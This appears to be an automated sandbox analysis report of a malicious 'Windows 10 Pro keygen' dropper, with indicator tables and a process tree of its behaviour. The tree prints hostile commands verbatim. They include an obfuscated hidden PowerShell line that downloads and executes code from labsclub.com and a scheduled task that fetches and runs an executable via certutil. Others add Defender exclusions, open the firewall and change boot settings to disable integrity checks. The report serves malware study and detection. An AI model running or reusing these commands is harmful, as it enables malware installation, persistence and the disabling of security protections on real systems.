4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4544	onaqkq5mwmg.tmp
4904	IBInstaller_97039.tmp
4436	vict.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp
4576	vpn.tmp

Suspicious use of SetWindowsHookEx 64 IoCs

Processes:

vict.exeaskinstall24.exeloboydfybij.exeonaqkq5mwmg.exeSetup3310.exevpn.exevict.tmpSetup3310.tmponaqkq5mwmg.tmpvpn.tmpIBInstaller_97039.exeIBInstaller_97039.tmpapp.exewinlthst.exewimapi.exechrome_proxy.exe1rexm2eyd4t.exe1rexm2eyd4t.tmpSetup.exeSetup.tmpWerFault.exeMicrosoftEdge.exeXagdaNLKU.exeXagdaNLKU.exeGDZ4y6rzJ.exe7za.exeGDZ4y6rzJ.exeDelta.exeDelta.tmpSetup.exePictureLAb.exePictureLAb.tmpreg.exe7za.exeSetup.exeSetup.tmphjjgaa.exeprolab.exeprolab.tmpjfiag3g_gg.exetapinstall.exejfiag3g_gg.exegaooo.exejfiag3g_gg.exemd7_7dfj.exeaskinstall29.exejfiag3g_gg.execustomer4.exemain.exeprivacytools5.exesetup.exesetup.exesetups.exesetups.tmpmask_svc.exeConhost.exeparse.exeparse.exemask_svc.exe7za.exereg.exe7za.exevict.exe

pid	process
4136	vict.exe
4144	askinstall24.exe
4208	loboydfybij.exe
4200	onaqkq5mwmg.exe
4348	Setup3310.exe
4420	vpn.exe
4436	vict.tmp
4524	Setup3310.tmp
4544	onaqkq5mwmg.tmp
4576	vpn.tmp
4848	IBInstaller_97039.exe
4904	IBInstaller_97039.tmp
4924	app.exe
5084	winlthst.exe
5104	wimapi.exe
4236	chrome_proxy.exe
4680	1rexm2eyd4t.exe
4668	1rexm2eyd4t.tmp
4140	Setup.exe
4844	Setup.tmp
5380	WerFault.exe
5256	MicrosoftEdge.exe
5628	XagdaNLKU.exe
5856	XagdaNLKU.exe
5896	GDZ4y6rzJ.exe
5864	7za.exe
5128	GDZ4y6rzJ.exe
5392	Delta.exe
5508	Delta.tmp
836	Setup.exe
4536	PictureLAb.exe
4388	PictureLAb.tmp
1140	reg.exe
5248	7za.exe
6080	Setup.exe
4920	Setup.tmp
5640	hjjgaa.exe
5196	prolab.exe
4888	prolab.tmp
4728	jfiag3g_gg.exe
1140	reg.exe
5632	tapinstall.exe
3176	jfiag3g_gg.exe
7616	gaooo.exe
7844	jfiag3g_gg.exe
4328	md7_7dfj.exe
6212	askinstall29.exe
6304	jfiag3g_gg.exe
4592	customer4.exe
6472	main.exe
7672	privacytools5.exe
5636	setup.exe
6960	setup.exe
6072	setups.exe
7040	setups.tmp
4804	mask_svc.exe
6456	Conhost.exe
1292	parse.exe
7612	parse.exe
5900	mask_svc.exe
6016	7za.exe
5672	reg.exe
7308	7za.exe
6492	vict.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.execmd.exekeygen-pr.exekeygen-step-4.exekeygen-step-3.exekey.execmd.exetaskkill.exeaskinstall20.execmd.exemultitimer.exemultitimer.exefile.exe

description	pid	process	target process
PID 1232 wrote to memory of 3224	1232	Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.exe	cmd.exe
PID 1232 wrote to memory of 3224	1232	Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.exe	cmd.exe
PID 1232 wrote to memory of 3224	1232	Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.exe	cmd.exe
PID 3224 wrote to memory of 3660	3224	cmd.exe	keygen-pr.exe
PID 3224 wrote to memory of 3660	3224	cmd.exe	keygen-pr.exe
PID 3224 wrote to memory of 3660	3224	cmd.exe	keygen-pr.exe
PID 3224 wrote to memory of 1368	3224	cmd.exe	keygen-step-1.exe
PID 3224 wrote to memory of 1368	3224	cmd.exe	keygen-step-1.exe
PID 3224 wrote to memory of 1368	3224	cmd.exe	keygen-step-1.exe
PID 3224 wrote to memory of 832	3224	cmd.exe	keygen-step-3.exe
PID 3224 wrote to memory of 832	3224	cmd.exe	keygen-step-3.exe
PID 3224 wrote to memory of 832	3224	cmd.exe	keygen-step-3.exe
PID 3224 wrote to memory of 3932	3224	cmd.exe	keygen-step-4.exe
PID 3224 wrote to memory of 3932	3224	cmd.exe	keygen-step-4.exe
PID 3224 wrote to memory of 3932	3224	cmd.exe	keygen-step-4.exe
PID 3660 wrote to memory of 3136	3660	keygen-pr.exe	key.exe
PID 3660 wrote to memory of 3136	3660	keygen-pr.exe	key.exe
PID 3660 wrote to memory of 3136	3660	keygen-pr.exe	key.exe
PID 3932 wrote to memory of 584	3932	keygen-step-4.exe	taskkill.exe
PID 3932 wrote to memory of 584	3932	keygen-step-4.exe	taskkill.exe
PID 832 wrote to memory of 1096	832	keygen-step-3.exe	cmd.exe
PID 832 wrote to memory of 1096	832	keygen-step-3.exe	cmd.exe
PID 832 wrote to memory of 1096	832	keygen-step-3.exe	cmd.exe
PID 3136 wrote to memory of 3996	3136	key.exe	key.exe
PID 3136 wrote to memory of 3996	3136	key.exe	key.exe
PID 3136 wrote to memory of 3996	3136	key.exe	key.exe
PID 3136 wrote to memory of 3996	3136	key.exe	key.exe
PID 3136 wrote to memory of 3996	3136	key.exe	key.exe
PID 3136 wrote to memory of 3996	3136	key.exe	key.exe
PID 3136 wrote to memory of 3996	3136	key.exe	key.exe
PID 3136 wrote to memory of 3996	3136	key.exe	key.exe
PID 3136 wrote to memory of 3996	3136	key.exe	key.exe
PID 3136 wrote to memory of 3996	3136	key.exe	key.exe
PID 3136 wrote to memory of 3996	3136	key.exe	key.exe
PID 3136 wrote to memory of 3996	3136	key.exe	key.exe
PID 3136 wrote to memory of 3996	3136	key.exe	key.exe
PID 3136 wrote to memory of 3996	3136	key.exe	key.exe
PID 3136 wrote to memory of 3996	3136	key.exe	key.exe
PID 1096 wrote to memory of 2124	1096	cmd.exe	PING.EXE
PID 1096 wrote to memory of 2124	1096	cmd.exe	PING.EXE
PID 1096 wrote to memory of 2124	1096	cmd.exe	PING.EXE
PID 584 wrote to memory of 2924	584	taskkill.exe	multitimer.exe
PID 584 wrote to memory of 2924	584	taskkill.exe	multitimer.exe
PID 3932 wrote to memory of 2052	3932	keygen-step-4.exe	askinstall20.exe
PID 3932 wrote to memory of 2052	3932	keygen-step-4.exe	askinstall20.exe
PID 3932 wrote to memory of 2052	3932	keygen-step-4.exe	askinstall20.exe
PID 2052 wrote to memory of 2652	2052	askinstall20.exe	cmd.exe
PID 2052 wrote to memory of 2652	2052	askinstall20.exe	cmd.exe
PID 2052 wrote to memory of 2652	2052	askinstall20.exe	cmd.exe
PID 2652 wrote to memory of 584	2652	cmd.exe	taskkill.exe
PID 2652 wrote to memory of 584	2652	cmd.exe	taskkill.exe
PID 2652 wrote to memory of 584	2652	cmd.exe	taskkill.exe
PID 3932 wrote to memory of 2164	3932	keygen-step-4.exe	file.exe
PID 3932 wrote to memory of 2164	3932	keygen-step-4.exe	file.exe
PID 3932 wrote to memory of 2164	3932	keygen-step-4.exe	file.exe
PID 2924 wrote to memory of 2084	2924	multitimer.exe	multitimer.exe
PID 2924 wrote to memory of 2084	2924	multitimer.exe	multitimer.exe
PID 2084 wrote to memory of 672	2084	multitimer.exe	multitimer.exe
PID 2084 wrote to memory of 672	2084	multitimer.exe	multitimer.exe
PID 2164 wrote to memory of 1636	2164	file.exe	CDB6.tmp.exe
PID 2164 wrote to memory of 1636	2164	file.exe	CDB6.tmp.exe
PID 2164 wrote to memory of 1636	2164	file.exe	CDB6.tmp.exe
PID 2164 wrote to memory of 1540	2164	file.exe	CF6C.tmp.exe
PID 2164 wrote to memory of 1540	2164	file.exe	CF6C.tmp.exe

C:\Users\Admin\AppData\Local\Temp\Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.exe
"C:\Users\Admin\AppData\Local\Temp\Microsoft_Windows_10_Pro_10_0_keygen_by_KeygenNinja.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1232

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:3224

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
keygen-pr.exe -p83fsase3Ge
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3660

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3136

C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
5⤵
- Executes dropped EXE
PID:3996

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
keygen-step-1.exe
3⤵
- Executes dropped EXE
PID:1368

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
keygen-step-3.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:832

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:1096

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
5⤵
- Runs ping.exe
PID:2124

C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
keygen-step-4.exe
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3932

C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
4⤵
PID:584

C:\Users\Admin\AppData\Local\Temp\RNKNRH41AY\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\RNKNRH41AY\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2924

C:\Users\Admin\AppData\Local\Temp\RNKNRH41AY\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\RNKNRH41AY\multitimer.exe" 1 3.1616095784.6053aa2870069 101
6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2084

C:\Users\Admin\AppData\Local\Temp\RNKNRH41AY\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\RNKNRH41AY\multitimer.exe" 2 3.1616095784.6053aa2870069
7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:672

C:\Users\Admin\AppData\Local\Temp\kkomqzwqf2s\vict.exe
"C:\Users\Admin\AppData\Local\Temp\kkomqzwqf2s\vict.exe" /VERYSILENT /id=535
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4136

C:\Users\Admin\AppData\Local\Temp\is-TFASG.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TFASG.tmp\vict.tmp" /SL5="$50228,870426,780800,C:\Users\Admin\AppData\Local\Temp\kkomqzwqf2s\vict.exe" /VERYSILENT /id=535
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4436

C:\Users\Admin\AppData\Local\Temp\is-B6VJ0.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-B6VJ0.tmp\wimapi.exe" 535
10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5104

C:\Users\Admin\AppData\Local\Temp\GDZ4y6rzJ.exe
"C:\Users\Admin\AppData\Local\Temp\GDZ4y6rzJ.exe"
11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:5896

C:\Users\Admin\AppData\Local\Temp\GDZ4y6rzJ.exe
"C:\Users\Admin\AppData\Local\Temp\GDZ4y6rzJ.exe"
12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5128

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
11⤵
PID:6272

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
12⤵
- Blocklisted process makes network request
PID:5168

C:\Users\Admin\AppData\Local\Temp\gan1dn24kyp\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\gan1dn24kyp\askinstall24.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4144

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:4968

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:4748

C:\Users\Admin\AppData\Local\Temp\0kd5epl51hf\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\0kd5epl51hf\AwesomePoolU1.exe"
8⤵
- Executes dropped EXE
- Modifies system certificate store
PID:4160

C:\Users\Admin\AppData\Local\Temp\3eonopc13im\loboydfybij.exe
"C:\Users\Admin\AppData\Local\Temp\3eonopc13im\loboydfybij.exe" /ustwo INSTALL
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 648
9⤵
- Drops file in Windows directory
- Program crash
PID:4944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 660
9⤵
- Program crash
PID:4632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 772
9⤵
- Program crash
PID:4396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 808
9⤵
- Program crash
PID:4988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 880
9⤵
- Program crash
PID:4124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 956
9⤵
- Program crash
PID:2588

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4208 -s 1084
9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5208

C:\Users\Admin\AppData\Local\Temp\45sh5hlfuno\onaqkq5mwmg.exe
"C:\Users\Admin\AppData\Local\Temp\45sh5hlfuno\onaqkq5mwmg.exe" /VERYSILENT
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4200

C:\Users\Admin\AppData\Local\Temp\is-7K5MM.tmp\onaqkq5mwmg.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7K5MM.tmp\onaqkq5mwmg.tmp" /SL5="$201F6,870426,780800,C:\Users\Admin\AppData\Local\Temp\45sh5hlfuno\onaqkq5mwmg.exe" /VERYSILENT
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4544

C:\Users\Admin\AppData\Local\Temp\is-CG8VD.tmp\winlthst.exe
"C:\Users\Admin\AppData\Local\Temp\is-CG8VD.tmp\winlthst.exe" test1 test1
10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5084

C:\Users\Admin\AppData\Local\Temp\XagdaNLKU.exe
"C:\Users\Admin\AppData\Local\Temp\XagdaNLKU.exe"
11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:5628

C:\Users\Admin\AppData\Local\Temp\XagdaNLKU.exe
"C:\Users\Admin\AppData\Local\Temp\XagdaNLKU.exe"
12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 1424
13⤵
- Program crash
PID:5252

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
11⤵
PID:6136

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
12⤵
- Blocklisted process makes network request
PID:4304

C:\Users\Admin\AppData\Local\Temp\mq3d0sd1er2\iohfq4l4pj4.exe
"C:\Users\Admin\AppData\Local\Temp\mq3d0sd1er2\iohfq4l4pj4.exe" 57a764d042bf8
8⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4256

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "C:\Program Files\9OZ13L0AAW\9OZ13L0AA.exe" 57a764d042bf8 & exit
9⤵
PID:4700

C:\Program Files\9OZ13L0AAW\9OZ13L0AA.exe
"C:\Program Files\9OZ13L0AAW\9OZ13L0AA.exe" 57a764d042bf8
10⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4812

C:\Users\Admin\AppData\Local\Temp\4bmjdtokj2y\lgnex2kjd01.exe
"C:\Users\Admin\AppData\Local\Temp\4bmjdtokj2y\lgnex2kjd01.exe" testparams
8⤵
- Executes dropped EXE
PID:4284

C:\Users\Admin\AppData\Roaming\eyk0e3kpjuc\1rexm2eyd4t.exe
"C:\Users\Admin\AppData\Roaming\eyk0e3kpjuc\1rexm2eyd4t.exe" /VERYSILENT /p=testparams
9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4680

C:\Users\Admin\AppData\Local\Temp\is-3CEA7.tmp\1rexm2eyd4t.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3CEA7.tmp\1rexm2eyd4t.tmp" /SL5="$701F0,549376,61440,C:\Users\Admin\AppData\Roaming\eyk0e3kpjuc\1rexm2eyd4t.exe" /VERYSILENT /p=testparams
10⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:4668

C:\Users\Admin\AppData\Local\Temp\q1l1hs0cwu0\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\q1l1hs0cwu0\vpn.exe" /silent /subid=482
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4420

C:\Users\Admin\AppData\Local\Temp\r4ww53u0lsj\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\r4ww53u0lsj\Setup3310.exe" /Verysilent /subid=577
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4348

C:\Users\Admin\AppData\Local\Temp\g2e0hdmroik\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\g2e0hdmroik\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4848

C:\Users\Admin\AppData\Local\Temp\is-09N4U.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-09N4U.tmp\IBInstaller_97039.tmp" /SL5="$10366,14597143,721408,C:\Users\Admin\AppData\Local\Temp\g2e0hdmroik\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4904

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://janiboots.store/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
10⤵
- Checks computer location settings
PID:5116

C:\Users\Admin\AppData\Local\Temp\is-95K0T.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-95K0T.tmp\{app}\chrome_proxy.exe"
10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4236

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-95K0T.tmp\{app}\chrome_proxy.exe"
11⤵
PID:5952

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
12⤵
- Runs ping.exe
PID:4380

C:\Users\Admin\AppData\Local\Temp\p4ecib30zcp\app.exe
"C:\Users\Admin\AppData\Local\Temp\p4ecib30zcp\app.exe" /8-23
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:4924

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Still-Rain"
9⤵
PID:4664

C:\Program Files (x86)\Still-Rain\7za.exe
"C:\Program Files (x86)\Still-Rain\7za.exe" e -p154.61.71.51 winamp-plugins.7z
9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5864

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Still-Rain\app.exe" -map "C:\Program Files (x86)\Still-Rain\WinmonProcessMonitor.sys""
9⤵
PID:6064

C:\Program Files (x86)\Still-Rain\app.exe
"C:\Program Files (x86)\Still-Rain\app.exe" -map "C:\Program Files (x86)\Still-Rain\WinmonProcessMonitor.sys"
10⤵
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
PID:4128

C:\Program Files (x86)\Still-Rain\7za.exe
"C:\Program Files (x86)\Still-Rain\7za.exe" e -p154.61.71.51 winamp.7z
9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5248

C:\Program Files (x86)\Still-Rain\app.exe
"C:\Program Files (x86)\Still-Rain\app.exe" /8-23
9⤵
- Executes dropped EXE
PID:3468

C:\Program Files (x86)\Still-Rain\app.exe
"C:\Program Files (x86)\Still-Rain\app.exe" /8-23
10⤵
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:7108

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
11⤵
PID:7768

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
12⤵
- Drops file in Windows directory
PID:5060

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
12⤵
- Modifies data under HKEY_USERS
PID:5784

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /8-23
11⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:6264

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
12⤵
- Creates scheduled task(s)
PID:7032

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
12⤵
- Creates scheduled task(s)
PID:5484

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
12⤵
- Loads dropped DLL
PID:6076

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
13⤵
- Modifies boot configuration data using bcdedit
PID:8008

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
13⤵
- Modifies boot configuration data using bcdedit
PID:1460

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
13⤵
- Modifies boot configuration data using bcdedit
PID:4108

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
13⤵
- Modifies boot configuration data using bcdedit
PID:7384

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
13⤵
- Modifies boot configuration data using bcdedit
PID:4580

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
13⤵
- Modifies boot configuration data using bcdedit
PID:8184

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
14⤵
- Adds Run key to start application
PID:5280

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
13⤵
- Modifies boot configuration data using bcdedit
PID:6096

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
13⤵
- Modifies boot configuration data using bcdedit
PID:5708

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
13⤵
- Modifies boot configuration data using bcdedit
PID:4020

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
13⤵
- Modifies boot configuration data using bcdedit
PID:7364

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
13⤵
- Modifies boot configuration data using bcdedit
PID:1124

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
13⤵
- Modifies boot configuration data using bcdedit
PID:4836

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
13⤵
- Modifies boot configuration data using bcdedit
PID:1752

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
13⤵
- Modifies boot configuration data using bcdedit
PID:6840

C:\Windows\System32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
12⤵
- Modifies boot configuration data using bcdedit
PID:6132

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
12⤵
PID:4724

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
12⤵
PID:6688

C:\Windows\SysWOW64\cmd.exe
